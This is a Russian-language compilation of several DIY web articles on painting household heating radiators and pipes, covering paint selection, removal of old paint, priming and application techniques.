Как правильно покрасить батареи отопления своими руками — создать ровное прочное покрытие

Как покрасить батареи отопления своими руками

  • Инструменты и материалы
  • Выбор качественной краски
  • Технология окрашивания батарей

В процессе ремонта, после монтажа, по причине утери первоначального цвета и появления сколов часто производится покраска батарей. Хозяева принимают решение покрасить батареи, если их цвет не позволяет создать единый стиль в комнате.

Краска для батарей должна обладать неизменностью цвета, не бояться высоких температур и противодействовать коррозии.

Окрашивание поможет устранить незначительные сколы и царапины, которые могут остаться после монтажа.

Обратите внимание

Для того чтобы радиаторы выглядели красиво после окрашивания, правильно будет, если их поверхность окажется предварительно подготовленной к покраске. Для начала необходимо определить, как сильно загрязнены поверхности, радиаторы придется тщательно очистить, прежде чем начать красить. При этом следует использовать влажную тряпочку, ершик или пульверизатор.

Даже поверхность нового радиатора предстоит обезжирить. Для очистки следует использовать наждачную бумагу, предварительно избавив основание от пыли. Можно использовать специальную щетку, которой оснащается дрель, это поможет качественно подготовить основание для проведения дальнейших работ.

Если подготовительными работами пренебречь, краска станет откалываться и быстро потеряет первоначальный внешний вид.

Для того чтобы получить наиболее хороший результат, следует избавить батареи от старого слоя краски. Особенное внимание следует уделить участкам, которые затронула ржавчина. Правильно будет, если при их очистке вы достигнете металла.

Можно для подготовки основания использовать смывочные растворы, их наносят на сухую поверхность батареи, используя малярную кисть. Затем батарею следует укутать с помощью пленки. Спустя час после нанесения раствора, нужно, используя шпатель, избавиться от старого слоя краски.

Инструменты и материалы

Этапы покраски батарей.

  • щетка для дрели;
  • дрель;
  • смывочные растворы;
  • малярная кисть;
  • пленка;
  • шпатель;
  • наждачная бумага;
  • уайт-спирит;
  • антикоррозийная грунтовка;
  • гладкий валик;
  • кисть;
  • краска.

Преимущество применения специальных смывок состоит в безвредности этих средств. Они способны влиять лишь на слои краски, не затрагивая металл. После избавления от старой краски поверхность предстоит обработать, используя наждачную бумагу, не следует забывать и об обезжиривании. Для этого необходимо использовать слабощелочной раствор, например уайт-спирит.

В качестве заключительного этапа подготовки, перед тем как начинать красить, следует нанести на батарею слоя антикоррозийной грунтовки.

После того как выполнены вышеперечисленные действия, можно считать поверхность подготовленной, на такое основание краска превосходно ляжет, ведь подготовленное к окрашиванию изделие обладает отличными адгезивными характеристиками.

Источник: http://remontonly.ru/kak-pokrasit-batarei-otopleniya-svoimi-rukami.html

Как покрасить батарею отопления: пошаговая инструкция

Если во время ремонта помещения нет возможности заменить старую батарею отопления, улучшить ее внешний вид можно, нанеся свежую краску.

Сделать это можно только с чугунными отопительными приборами или радиаторами старого образца.

Важно

Более современный алюминиевый радиатор с ребрами красить своими руками нежелательно – на них нужно наносить тонкий и ровный слой порошковой краски, добиться гладкого покрытия в домашних условиях неспециалисту достаточно сложно.

Чтобы не допустить ошибок, перед началом работ стоит изучить рекомендации, посмотреть фото и видео процесса.

Выбор краски для батареи

Выбор краски

Для окрашивания старой батареи не подойдет любая краска.

К средству предъявляют следующие требования:

  1. Оно должно быть термоустойчивым. Поскольку температура радиатора во время отопительного сезона достигает около 80 °С, краска не должна трескаться при таких условиях.
  2. Обладать противокоррозионными свойствами.
  3. Не выцветать со временем, быть устойчивым к изнашиванию.
  4. Содержать в своем составе минимум токсичных веществ или быть нетоксичным.

Покрывать чугунные радиаторы масляной краской не рекомендуется – она источает сильный запах, долго сохнет, имеет токсичный состав, поэтому считается устаревшей.

Подходящие виды красок:

  1. Акриловые. Отличаются легким равномерным нанесением, устойчивостью к высоким температурам. Прочны и создают долговечное глянцевое покрытие, не теряющее со временем цвет.

    К недостаткам можно отнести сильный запах, который держится во время нанесения состава и некоторое время после высыхания.

  2. Алкидные. Самый популярный и логичный выбор, объясняющийся соответствием краски такого типа всем требованиям и большим выбором цветов.

    Однако при окрашивании радиатора этой краской следует отдать предпочтение темным тонам, поскольку белый и светлые цвета могут достаточно быстро приобрести желтизну.

  3. Акриловые водоэмульсионные.

    Современные составы такого типа обладают устойчивостью ко внешним воздействиям, длительное время сохраняют яркость цвета, не тускнеют. Нужный оттенок получают, добавляя в основу колер подходящего цвета.акриловые водоэмульсионные краски

  4. Двухкомпонентные.

    Состоят из термостойкого лака и пудры, ингредиенты перед использованием смешивают. Доступные по цене, легко и ровно ложатся на окрашиваемую поверхность, долговечны.

  5. Аэрозольные. Их выбирают из-за широкой палитры цветов и возможности быстро и просто нанести краску своими руками.

Подготовка рабочей поверхности

Перед тем как покрасить батарею отопления, следует подготовить ее к нанесению краски.

Даже если планируется окрашивание новой батареи, необходимо правильно ее обработать: очистить от пыли и грязи, ошкурить и обезжирить.

Это нужно, чтобы нанесенное покрытие легло ровно и закрепилось на поверхности как можно прочнее.

Если пренебречь этими рекомендациями, впоследствии могут быть проблемы: высохшая краска начнет трескаться, целостность ее будет нарушена, поверхность окажется неровной. Кроме того, теплоотдача радиатора уменьшится.

Вместе с отопительными приборами обычно красят и чугунные трубы, тогда их также необходимо правильно подготовить.

План действий:

  • влажной тряпкой с поверхностей удаляют пыль и грязь;
  • избавляются от остатков старой краски;
  • поврежденные коррозией места радиатора тщательно зачищают;
  • с помощью наждачной бумаги рабочие поверхности ошкуривают, а затем обезжиривают спиртом;
  • на очищенную поверхность наносят грунтовку (желательно использовать антикоррозийную, чтобы защитить батареи от ржавчины).

Все непонятные моменты можно уточнить, если посмотреть видео с советами профессионалов.

Работать следует в перчатках, открыв форточки и защитив дыхательные пути респиратором.

Способы снятия старой краски

От остатков прежнего покрытия можно избавиться двумя методами.
Первый – механический – задействовать шпатель, наждачную бумагу или шлифовальную машину. Даже с помощью электрического прибора процесс окажется весьма трудоемким, поэтому чаще используют второй способ.

Он заключается в нанесении химической смывки. Раствор обильно наносят на все окрашенные поверхности, укутывают батарею пленкой, чтобы увеличить эффективность, оставляют на время, указанное на упаковке конкретного средства. Затем, используя щетку с металлической щетиной и шпатель, снимают легко отходящий старый слой покрытия.

Общие правила

Покрывать краской можно лишь холодный радиатор – нанесение ее на нагретую поверхность приведет к тому, что жидкость будет пузыриться, распределяться неравномерно, а высохшая батарея покроется потеками и разводами.

Правильно делать это перед началом или после окончания отопительного сезона. При необходимости провести окрашивание в зимний период, доступ горячей воды к радиатору перекрывают с помощью вентилей, и начинают работу после того, как он полностью остынет. Вновь открывают вентили только после того, как краска окончательно просохнет.

Процесс окрашивания

Наносить краску начинают сверху, в противном случае нижние окрашенные части будут испорчены потеками. Покрывают краской весь радиатор целиком, в том числе и заднюю его часть. Для качественного и прочного покрытия необходимо нанести 2 тонких слоя, делая между ними перерыв, чтобы первый успел подсохнуть.

Чтобы облегчить процесс окрашивания радиатора своими руками, можно снять его – так труднодоступных мест будет меньше, и работать станет удобнее. В этом случае лучше воспользоваться краскопультом.

Можно изучить фото, на котором изображен процесс нанесения краски этим устройством, чтобы оценить простоту работы с ним.
Рекомендуется развести краску до более жидкой консистенции, если планируется окрашивание с помощью краскопульта.

Делают это с учетом ее типа: водоэмульсионные разбавляют водой, а в алкидные эмали и лаки добавляют уайт-спирит.

При работе следует наплавлять струю сверху вниз, дера прибор на расстоянии примерно 30 см от обрабатываемой поверхности.

Получить гладкий и равномерно распределенный слой краски также можно с помощью поролонового валика небольшого диаметра. Для мест, в которых работать им неудобно, стоит воспользоваться кистью с загнутым концом, предназначенную специально для этой цели.

Перед началом работ под батарею рекомендуется подстелить старые газеты или специальную пленку, чтобы защитить пол от загрязнений.

Совет

Краску наносят последовательно, не делая пропусков, не набирая на кисть за раз слишком большого количества жидкости. Толстый слой будет выглядеть неровно, ухудшит теплоотдачу батареи.

Просмотрев пошаговые фото процесса окрашивания, видео, в котором специалисты рассказывают о нюансах работы, и приняв во внимание изложенные выше рекомендации, можно легко и качественно обновить старое покрытие на батареях своими руками.

Источник: http://stroypomochnik.ru/kak-pokrasit-batareyu-otopleniya-poshagovaya-instruktsiya/

Как покрасить радиатор отопления своими руками

Время от времени в связи с образованием сколов и потери цвета батареи нуждаются в покраске.

Красят батареи в новый цвет также для создания единой цветовой гаммы в комнате. Нужно учесть все нюансы этого процесса.

Подготовка радиатора к окрашиванию

Не стоит недооценивать роль подготовительных работ при окрашивании радиаторов отопления. Первым делом нужно очистить радиатор от грязи и обезжирить его.

Воспользоваться для этого можно пульверизатором и ершиком, что могут попасть в труднодоступные места. Затем поверхность проходит обработку при использовании наждачной бумаги.

На новом слое краски могут образоваться трещины и сколы, если этого не сделать. Старый слой снимается, грунтовый слой полностью удаляют. Особенно нужно уделить внимание ржавчине. Места, где ее обнаружили, обрабатывают до металлической основы радиатора.

Посмотрите видео как окрасить радиатор отопления

Инструменты и материалы для покраски радиаторов отопления

Важно наличие инструментов, которые применяют в окрашивании батарей. Для этого можно приобрести специальную щетку, которую вставляют в дрель и обрабатывают ей батарею.

Растворы для смывки тоже достаточно эффективны. На всю площадь сухой поверхности батареи нужно нанести раствор малярной кисточкой, после обработки замотать батарею пленкой.

Краска станет мягкой и с помощью обычного шпателя ее можно будет убрать спустя час. Достоинство такой смеси в том, что она безвредна для металла. Когда старая краска удалена, поверхность обрабатывается наждаком и обезжиривается.

Это можно сделать при использовании слабощелочного раствора, например, уайт – спирита. И наконец, на радиатор наносится слой грунтового покрытия антикоррозийного действия. Теперь радиатор готов к окрашиванию.

Как выбрать краску для батарей?

В работе рекомендуется использование краски, которая обладает термостойкостью, износостойкостью, нетоксичностью, так как необходимо регулярно очищать батареи, а радиатор во время отопительного сезона все время находится в нагретом состоянии. Наиболее термостойкой считается краска, в составе которой пудра из металла вместо красящих веществ.

В ассортименте можно найти специализированные краски для радиаторов, эмали на основе воды и лаки, обладающие термостойкостью. Предназначение краски для металла является обязательным условием, как и соответствие грунтовому слою. Смеси высокого качества защищают батарею от появления коррозии, не изменяют свой оттенок и служат долго.

Обратите внимание

Блеск, устойчивость оттенка на долгий период могут быть обеспечены акриловыми красками, содержащими в основе растворители органического происхождения. Единственный минус – это резкий запах во время нанесения. Быстросохнущими являются и краски водно-дисперсионного типа, но их нужно тщательно подбирать.

В результате окрашивания эмалями алкидного вида покрытию гарантирована однородная текстура и стойкость. Но во время окрашивания и некоторое время спустя может присутствовать сильный запах.

Какой цвет выбрать?

Выбор цвета зависит от предпочтений хозяев. В ассортименте можно отыскать массу средств и различных составов.

К классическим относятся белые оттенки и серебряные. Некоторые отдают предпочтение цвету, который служит основой интерьера. Оригинально будут выглядеть орнаменты, золотистые и бронзовые рисунки.

Советы по покраске батарей своими руками

От подготовки радиатора качество окрашивания зависит напрямую. Для нанесения слоев краски удобно воспользоваться валиком, сделанным из поролона маленького диаметра и кисточкой для труднодоступных участков. Чтобы сделать процесс окраски удобнее, следует снять батарею.

В снятом состоянии все стороны удобны для окрашивания. Однако выбор способа зависит от условий и времени, которое уделяется ремонтным работам в каждом конкретном случае.

Важнейшее условие – это покраска холодной батареи, чтобы после окрашивания не образовывались пузыри, трещины, пятнистости и разводы. Для этого можно перекрыть вентили от стояков.

Окрашивание требует скрупулезности и тщательности исполнения.

Хороши в применении небольшого размера кисти и валики, баллоны с краской. При использовании краскопульта снятая батарея хорошо окрашивается со всех сторон. Слой должен быть нанесен равномерно.

Окраску начинают со сложнодоступных участков. Окрашивание лучше производить с верхней части радиатора, чтобы нижняя не была испорчена от потеков сверху. Состав наносят на все стороны, а не только на переднюю.

Предпочтительнее производить окраску в два слоя, но второй можно нанести только после того, как первый совсем высохнет. В таком случае не возникнут потеки. Грамотное окрашивание позволит придать радиатору прекрасный вид, причем покрытие прослужит долго.

Источник: https://nastroike.com/uchimsya-vmeste/686-podgotovka-radiatora-k-okrashivaniyu

Покраска радиаторов отопления и труб: инструкция по окраске, как и чем покрасить, видео и фото

Радиаторы отопления или, проще говоря, батареи являются неотъемлемой частью интерьера большинства домов. Но неприглядный внешний вид этих агрегатов способен напрочь испортить любой ремонт.

Их полная замена далеко не всегда оправдана, а вот самостоятельная покраска радиаторов и труб отопления способна радикально изменить ситуацию, причем за приемлемые деньги.

Сегодня мы будем говорить о том, как своими руками покрасить батареи и какие составы для этого использовать.

Фото окрашивания батареи.

Радиаторы и конвекторы

В некоторых городских квартирах в свое время устанавливались так называемые конвекторы. Это металлические трубы с частым и тонким, как правило, алюминиевым оребрением. Так вот такие отопительные приборы вообще не красятся, по причине того, что тонкие пластины при окрашивании значительно теряют проектные характеристики теплоотдачи.

Отопительный коллектор с кожухом.

По технологии в комплект бытовых конвекторов обязательно должен входить защитный, съемный металлический кожух. Вот как раз его то и можно красить. Хотя если сказать честно, КПД у старых отопительных приборов подобной конструкции оставляет желать лучшего и по большому счету их желательно вообще заменить.

Чаще всего вопросом как покрасить радиатор отопления, озадачены владельцы классических чугунных батарей. Ведь такие агрегаты изначально реализуются не окрашенными. Не говоря уже о тех батареях, которые стоят по нескольку десятков лет и обросли поистине вековыми наслоениями краски.

Окрашивание отопительных труб.

Важно

Современные биметаллические, алюминиевые или медные радиаторы, как правило, покрывают высококачественным порошковым напылением еще на заводе. И здесь речь о перекрашивании может идти, только если батарею серьезно поцарапали или человек пожалел денег и купил низкосортный товар с некачественным покрытием.

Такое иногда случается с китайскими батареями. О том, как красить радиаторы отопления из цветного металла мы также будем говорить.

Теплоотдача отопительных приборов.

Несколько слов о выборе краски

Решив придать своим батареям достойный вид, первый вопрос который возникает у нормального хозяина это чем покрасить радиаторы отопления? Ведь эти агрегаты эксплуатируются в экстремальных условиях и не каждая краска для них подойдет.

Термостойкий состав от марки Tikkurila

  • На мой взгляд, самым оптимальным вариантом являются краски на акриловой основе. В линейке есть 2 основных направления, акриловые и акрилатные. Если вас интересует глянцевое сияющее покрытие, то нужно брать акрилатную краску, в состав которой входят растворители.

Под нее не нужно будет грунтовать основу, но резкий запах при высыхании здесь обеспечен. Акриловые краски на водно-дисперсной основе практически не пахнут, но на финише вы получите матовое покрытие;

Акриловая эмаль.

  • Алкидные составы хороши только в случае, когда вас интересует темная палитра цветов. Дело в том, что при использовании белых или светлых алкидных красок, есть риск того, что они со временем пожелтеют;

Алкидная эмаль.

  • Не стоит сбрасывать со счетов классику жанра, а именно масляную краску. Конечно палитра цветов здесь не такая шикарная, как у выше упомянутых вариантов, плюс сохнуть она будет не менее суток. Зато цена у составов на масляной основе более чем доступная. Что же касается эксплуатационных характеристик, то качество такого покрытия проверено годами.

Параметры термостойкой краски.

Универсальная эмаль.

Подготовка и окрашивание радиатора

Если сказать честно, то подготовка к покраске зачастую забирает гораздо больше времени и сил, нежели непосредственно окраска радиаторов отопления. Но если вы хотите получить достойный конечный результат, то без тщательной подготовки здесь не обойтись.

Подготовка основы

Если не брать в расчет вариант покупки новой чугунной батареи, то прежде чем красить радиаторы отопления их желательно очистить от наслоений старого покрытия. Пойти здесь можно двумя путями.

В идеале, конечно, желательно полностью очистить поверхность до чистого металла. Но если по каким-либо причинам это невозможно, то следует правильно обработать старую краску, дабы на нее ровно легла новая.

Менее трудоемким способом снятия старого покрытия является использование химически активных смывок. Их сейчас много, в качестве примера можно назвать Б52, АСЕ, СП-6 и масса им подобных.

Это гелеобразная жидкость, которая наноситься кистью на батарею. О технике работы с ними писать нет смысла, для этого есть инструкция. Мы дадим лишь один совет — после обработки накрыть агрегат полиэтиленом.

Смывка для краски.

На отслоение краски может уйти от 15 минут до нескольких часов, данный параметр указывается на этикетке. По истечении этого времени вам нужно будет взять щетку с металлическим ворсом и счистить все наслоения.

В некоторых источниках люди советуют для снятия краски воспользоваться шпателем. Но поверьте в батарее столько кривых «закоулков» что скрести ее ровным шпателем, вам придется долго.

Смывка конечно вещь хорошая, но не спешите сразу бежать за ней на рынок, в данном способе есть несколько «подводных камней», о которых скромно умалчивают производители этого товара.

Отслоение краски с металла.

  • Далеко не все радиаторы, сделанные из цветных металлов, равнодушно относятся к химически активным соединениям. Согласитесь, обидно будет, если после снятия краски вы обнаружите, что смывка вступила в реакцию с металлом и на поверхности вашей гладкой батареи образовались нелицеприятные раковины. А в случае с тонкостенными изделиями, мощный химикат может вообще испортить радиатор;
  • Подобные жидкости штука весьма вредная и остро пахнущая. Поэтому работать с ними можно только в хорошо проветриваемой комнате и лучше в респираторе;
  • Часто можно слышать, что чугунным и стальным радиаторам современные смывки не страшны. Это действительно так. Но мало кто упоминает о том, что при сборке старых батарей в качестве уплотнения раньше использовалась пенька. Пенька делается из конопли или льна, соответственно разъедается химией очень быстро.

Батарею вы покрасите, но когда вы ее включите, вода может брызнуть со всех соединений. В этом случае можно посоветовать перебрать весь радиатор и поставить полимерные прокладки или отказаться от смывок.

Работа ручной металлической щеткой.

Когда краска удалена, гладкие поверхности, будь то сталь алюминий или медь, желательно зачистить наждаком, таким образом, вы избавитесь от глубоких царапин. Тереть шершавый чугун наждаком работа неблагодарная и по большей части бессмысленная. Здесь лучше воспользоваться жесткой металлической щеткой.

Насадка на дрель.

Работа болгаркой с металлической щеткой.

После очистки поверхности ее нужно обезжирить и прогрунтовать. Для этих целей прекрасно подходит недорогой отечественный грунт ГФ-021, кстати, для отечественных составов серий «МА» и «ПФ» это идеальный вариант. Цена на современные зарубежные аналоги, такие как АСЕ, Dulux или Sigma, значительно выше, но если вы берете дорогую, качественную краску, то имеет смысл потратиться.

Совет

Некоторые виды грунта обладают антикоррозийным воздействием. Но если вы хотите на долгие годы защитить свою батарею от коррозии, то для этого существуют огнезащитные краски по металлу Полистил, а также электропроводная краска ZINGA. Они предотвращают ржавление металла за счет покрытия его тонкой цинковой пленкой (так называемая холодная оцинковка).

Краски Полистил.

Хотя далеко не всегда стоит полностью снимать старое покрытие. Если краска только потеряла блеск и привлекательность, но не потрескалась и держится достаточно прочно, имеет смысл красить прямо по ней. Вам нужно лишь хорошо ее вымыть и ошкурить наждаком для лучшего сцепления с новым слоем. После чего батарею следует обезжирить и можно красить.

Ошкуривание поверхности.

Среди специалистов до сих пор не утихают споры о том, нужно ли грунтовать ошкуренную поверхность старого слоя. Я считаю, что в случае, когда речь идет о заводском порошковом напылении, грунт нужен. А если батарея красилась самостоятельно в кустарных условиях, то можно обойтись и без него.

Теперь поговорим о технике окрашивания

Некоторые советуют демонтировать батарею и спокойно красить ее со всех сторон.

Теоретически это верно, но на практике люди, дающие такие советы, видимо никогда не пытались в одиночку своими руками снять с навесов стандартный чугунный радиатор МС-140, который чаще всего встречается в наших домах. Вес одной пустой секции такого «баяна» колеблется в районе 7кг, плюс, если вы его уроните, чугун может лопнуть.

Классический радиатор МС-140.

Что же касается легких современных биметаллов, то вариант демонтажа вполне возможен, но имеет ли смысл его делать, решайте сами. На мой взгляд, если со стороны стены часть батареи останется плохо прокрашенной, ничего военного не произойдет. В любом случае ее там никто не увидит.

Работа кистью.

Сам процесс окрашивания не представляет абсолютно никакой сложности и доступен даже дилетанту.

Из инструмента вам понадобится пластиковая кюветка (емкость под краску с полем для обмакивания кисти или валика) и пара небольших кисточек.

Для работы по прямым поверхностям используется обычная кисть шириной порядка 3 – 4 см. А вот для окрашивания труднодоступных мест следует приобрести кисть с длинной, искривленной ручкой.

Набор кистей.

Дальше все элементарно просто. Завешиваете стену за батареей и застилаете пол под батареей старыми газетами или лучше полиэтиленом. После чего, наливаете краску в кюветку, обмакиваете кисть и начинаете красить.

Дабы не испачкаться, начинать нужно с «закоулков» внутри радиатора, причем все работы выполняются сверху вниз, чтобы скрыть неизбежные потеки.

Окрашивание аэрозольным баллончиком.

Обратите внимание

Но в данном случае, гораздо проще оставить в покое кисти и работать краскопультом или аэрозольными баллончиками. Во-первых, краска ложится ровно и без разводов. А во-вторых, намного удобнее доставать внутренние труднодоступные поверхности.

Только если речь идет о профессиональном краскопульте, то краску нужно будет разбавить десятью процентами соответствующего растворителя. Единственная проблема здесь в том, что обойдется такой вариант несколько дороже.

Можно ли красить горячие батареи

Данный вопрос интересует очень многих нетерпеливых домовладельцев. Спрос настолько велик, что некоторые фирмы начали выпускать товар который может наноситься на горячую поверхность.

Я вам однозначно заявляю, что красить горячие батареи нельзя. И практически все специалисты, с которыми мне приходилось общаться, поддерживают мое мнение.

Украшение современной батареи.

Основных причин здесь несколько:

  • Не считая акрилового состава на водно-дисперсной основе, все остальные краски делаются на остро пахнущих и весьма вредных растворителях. Попадая на горячую поверхность, эти растворители в десятки раз быстрее испаряются. А чтобы проветрить, вам придется среди зимы открыть настежь окна и держать их в таком положении несколько часов;
  • А если вы возьмете акриловый состав на водно-дисперсной основе, то запаха, конечно, не будет, но он будет сохнуть в течение нескольких секунд. По сути сразу после того, как вы проведете кистью. Качественно и без разводов нанести покрытие в таких условиях практически не реально;
  • В конце концов, существует технология, и если предусмотрено, что состав должен высыхать в течение, к примеру, 5 – 7 часов, то нужно дать ему это время. В результате нарушения технологии неизбежно изменятся и характеристики самого покрытия. Не стоит после этого удивляться тому, что краска через год облупилась или пожелтела.

Декор под золото.

Вывод

Покраска радиаторов и труб отопления дело не хитрое, но как видите, нюансов здесь хватает. На фото и видео в этой статье мы подобрали сопутствующую информацию по данной теме. Если же у вас возникли вопросы, то оставляйте их в комментариях, мы постараемся помочь.

Художественное оформление радиатора.

Источник: https://nashaotdelka.ru/vnutrennjaja/okracka/tehnuka/1177-pokraska-radiatorov-otopleniya

Как покрасить батарею отопления

Обычно процесс реставрации (ремонта) собственного дома или квартиры – занятие довольно сложное, длительное и трудоемкое.

Для того чтобы по окончании ремонтных работ дом имел правильный и гармоничный внешний вид, нужно не упустить из вида такую важную деталь ремонта, как покраска батарей центрального отопления.

В данной статье речь пойдет о том, как покрасить батарею отопления самостоятельно, не привлекая для этого сторонних специалистов.

Давно не крашенные и облезшие батареи с выцветшей краской вряд ли украсят стильную обстановку вашего дома, поэтому наиболее оптимальным вариантом является замена всех старых радиаторов квартиры новыми. Этот способ, несомненно, хорош, но, к сожалению, не у всех есть финансовая возможность его осуществить. Исходя из этого, лучшим решением проблемы является покраска старых батарей отопления.

Какие виды батарей можно красить

Прежде чем решиться на самостоятельную покраску батарей центрального отопления важно учесть тот факт, что далеко не все из современных видов батарей можно красить самостоятельно. Покраску допускается проводить только в случае наличия в квартире:

  • Чугунных батарей.
  • Радиаторов старого образца с многочисленными наборными ребристыми пластинами.

Универсальные батареи новых образцов, особенно радиаторы с алюминиевыми ребрами, самостоятельно красить не рекомендуется, потому что можно не только испортить внешний вид батареи, но и ухудшить ее функциональные качества. При покраске такой батареи, вручную нанесенные слои краски не будут смотреться идеально ровно и гладко, как это обычно бывает после заводского окрашивания качественным порошковым сырьем.

Как правильно выбрать краску

До недавнего времени жильцы современных частных и многоэтажных домов редко задавались вопросом: какой краской покрасить батарею? Объясняется это тем, что раньше на все трубы и батареи отопления наносилась исключительно белая краска.

Сегодня ситуация существенно изменилась, потому что для покраски батарей центрального отопления можно выбрать именно тот цвет краски, который идеально подчеркнет индивидуальную неповторимость интерьера того или иного помещения.

Тщательно продуманная покраска радиаторов придает батареям ухоженный внешний вид и будет защищать их от коррозии.

Важно

Для того чтобы конечный результат покраски батарей отопления получился как можно более качественным, необходимо правильно выбрать краску.

Основные требования, предъявляемые к современным краскам для отопительных радиаторов:

  1. Хорошая термическая устойчивость.
  2. Невосприимчивость к агрессивной внешней среде.
  3. Минимальная токсичность.
  4. Высокая степень устойчивости к изнашиванию (истиранию).

Виды красок

  • Акриловые краски. При высыхании имеют неприятный резкий запах ацетона. При окрашивании такой краской батареи отопления приобретают ровный глянцевый цвет, который остается таким на длительный промежуток времени.
  • Алкидные краски. В настоящее время алкидные краски пользуются большим покупательским спросом, так как отличаются высокой степенью термической устойчивости, длительно не изнашиваются и изготавливаются в различной цветовой палитре.
  • При покраске выделяют специфический запах, сохраняющийся в течение длительного промежутка времени (до нескольких дней).
  • Водно-дисперсионные краски. Являются быстросохнущими красящими материалами, не выделяющими резких запахов.
  • Масляные краски. Этот вид красок считается устаревшим и уже практически не используется для покраски батарей отопления.

Подготовка батарей

Не следует пренебрегать правильной подготовкой батарей перед их окрашиванием, потому что грамотно проведенный подготовительный процесс является залогом успешно выполненной работы в целом.

Этапы подготовки:

  1. Всевозможную пыль и грязь необходимо удалить с поверхности батареи влажной тряпкой или салфеткой. Далее, с помощью специального раствора и шпателя необходимо убрать с поверхности радиатора отстающие слои прежней краски. Места повреждений или коррозии нужно вычистить до металлического основания радиатора.
  2. На следующем этапе внутреннюю и наружную поверхность батареи нужно покрыть раствором для смывания краски, после чего обмотать радиатор пленочным материалом, что позволит создать условия для размягчения старой краски. По прошествии некоторого времени старое лакокрасочное покрытие удаляется металлической щеткой, шпателем или другими зачищающими инструментами. Во время работы рекомендуется пользоваться специальными защитными перчатками и респиратором.
  3. Далее батарею основательно зачищают наждачной бумагой и обезжиривают спиртовым раствором, после чего на чистую поверхность радиатора наносят грунтовочное средство на алкидной основе.
  4. Чтобы уберечь батарею от повторного появления ржавчины важно использовать только антикоррозионную грунтовку. В специализированных магазинах продается уже готовая краска, в состав которой входит грунтовка и антикоррозионная жидкость. Такой краской можно покрывать батареи отопления без вышеописанных подготовительных действий.

Покраска батарей отопления

Для достижения оптимального результата покраску батарей отопления лучше проводить до наступления отопительного сезона, так как в противном случае, краска будет сохнуть неравномерно, образовывая потеки и всевозможные пятна.

Следует помнить, что достаточно часто даже специализированные краски, предназначенные для покраски горячих радиаторов, ложатся на поверхность батареи не очень гладко, что смотрится не эстетично.

Если у вас нет времени или желания ждать окончания отопительного сезона и необходимо срочно покрасить горячие батареи, то нужно попробовать немного снизить температуру в радиаторах. Для этого можно самостоятельно попытаться перекрыть горячую воду в квартире или вызвать мастера из жилищно-эксплуатационной конторы.

После окончания всех подготовительных мероприятий можно приступать к окрашиванию батарей. Для качественного проведения работ необходимо иметь в наличии кисточки прямой и изогнутой формы. Изогнутой кистью будет удобно красить батарею не только снаружи, но и внутри.

Чтобы стекающие капли краски не испачкали пол, необходимо простелить под батарею пленку или старую бумагу. Начинать покраску батарей отопления лучше с внутренней ее части. Краску следует наносить по направлению сверху вниз.

Краске обязательно надо дать хорошо просохнуть, и только потом наносить второй слой.

Еще один способ нанесения краски на батарею отопления – это распыление ее из специального баллончика (краскопульта).

Совет

Преимущество такого метода окрашивания батарей заключается в том, что он отнимает намного меньше времени и сил.

При окраске батареи из краскопульта красящее вещество должно направляться сверху вниз, в то время как расстояние от баллончика до радиатора не должно превышать 25‒30 см.

Неукоснительное соблюдение всех технологий покраски батарей отопления дает возможность на длительный срок сохранить их привлекательный внешний вид и функциональные качества.

Видео

В этом видео продемонстрированы мастер-классы «белоснежный радиатор»:

Благодаря этому видео вы узнаете как покрасить батарею быстро, легко и красиво с помощью баллончика:

Источник: https://www.stroitelstvosovety.ru/kak-pokrasit-batareyu-otopleniya

Покраска батарей отопления своими руками

Главная / Радиаторы / Как покрасить батареи отопления своими руками

Чтобы сделать ремонт в квартире идеально, нужно учитывать массу нюансов. Неправильные действия могут привести к не очень хорошим последствиям. Любые забытые или проигнорированные мелочи дадут о себе знать. Это в скором времени приведет к повторным ремонтным работам.

Не исключением является и обновление внешнего вида элементов отопления. Самым распространенным видом ремонта, которому подвергаются трубы или батареи, является покраска.

Делают это для придания красивого внешнего вида старым изделиям или для подготовки к установке новых, недавно приобретенных.

Как покрасить батареи отопления своими руками

Перед тем как покрасить батареи отопления своими руками, нужно ознакомиться со всеми существующими видами материалов и порядком работ, чтобы не прибегать к повторной обработке.

В каких случаях возникает необходимость покраски

Довольно часто обновление внешнего вида батарей выполняется при общем ремонте всего помещения. Хозяева решают красить радиаторы отопления в другой цвет, который будет дополнять интерьер, созданный в квартире.

Покраска батареи

Когда нужна покраска батарей:

  • Во время приобретения нового отопительного элемента. Получить его в готовом к установке состоянии можно в редких случаях. Чаще всего новые радиаторы реализуются в не окрашенном виде.
  • В процессе длительной эксплуатации прибор утратил свои внешние характеристики, краска пожелтела, потрескалась или облезла. Этот пункт актуален, если в квартире стоят старые чугунные изделия, которые были популярны несколько десятилетий назад.
  • Во время ремонта всего помещения было решено красить батареи в цвет, дополняющий его интерьер.

Необходимые материалы

Для выполнения работы своими руками вам потребуется:

  • краска;
  • строительный фен;
  • специальный состав для снятия старой краски;
  • болгарка или шуруповерт со специальными проволочными насадками;
  • щетка по металлу, наждачная бумага;
  • грунтовка;
  • специальный раствор для обезжиривания поверхности;
  • шпатель;
  • шпатлевка;
  • кисточки, валики;
  • хлопковые тряпки;
  • пленка для укрытия поверхностей, которые не нужно окрашивать;
  • малярный скотч.

Подготовительные работы

Качественный результат зависит не только от правильного выбора материала и покраски. Огромную роль в этом играет тщательная подготовка. Чтобы не допустить растрескивания новой краски на батареях, следует своими руками выполнить несколько манипуляций:

При помощи строительного фена нужно нагревать старую краску до того момента, пока она не расплавится и не начнет облазить. Потом его можно будет снять с помощью шпателя.

Снимаем слой старой краски шпателем

В случае отсутствия монтажного фена используйте специальные составы для снятия краски. Всю батарею следует покрыть жидкостью, накрыть полиэтиленом и оставить.

Обратите внимание

Обычно процесс разъедания требует не больше часа. По истечении указанного отрезка времени краску снимают шпателем.

Так можно убрать практически все старое покрытие, но в некоторых местах оно останется, поэтому следует провести дополнительные манипуляции.

Для удаления остатков используют болгарку или шуруповерт со специальными проволочными насадками. С их помощью батарею можно зачистить до металла. Если такого электроинструмента в наличии нет, то зачистку делают специальной щеткой с металлическим ворсом или наждачной бумагой.

Болгаркой с металлической насадкой зачищаем батарею до металла

В том случае если на батареях есть заржавелые места, необходимо воспользоваться специальной жидкостью, предназначенной для снятия ржавчины. Приобрести ее можно в любом строительном магазине.

Это делают с помощью специальных средств: ацетон, уайт-спирит. Нужно вымочить тряпку в жидкости и тщательно вытереть всю поверхность радиатора отопления.

Покрываем батарею грунтовкой

На этом этапе батарею покрывают специальным антикоррозийным грунтовочным составом. Он будет препятствовать появлению коррозии на отопительном элементе. Сцепление краски с поверхностью радиатора станет лучше.

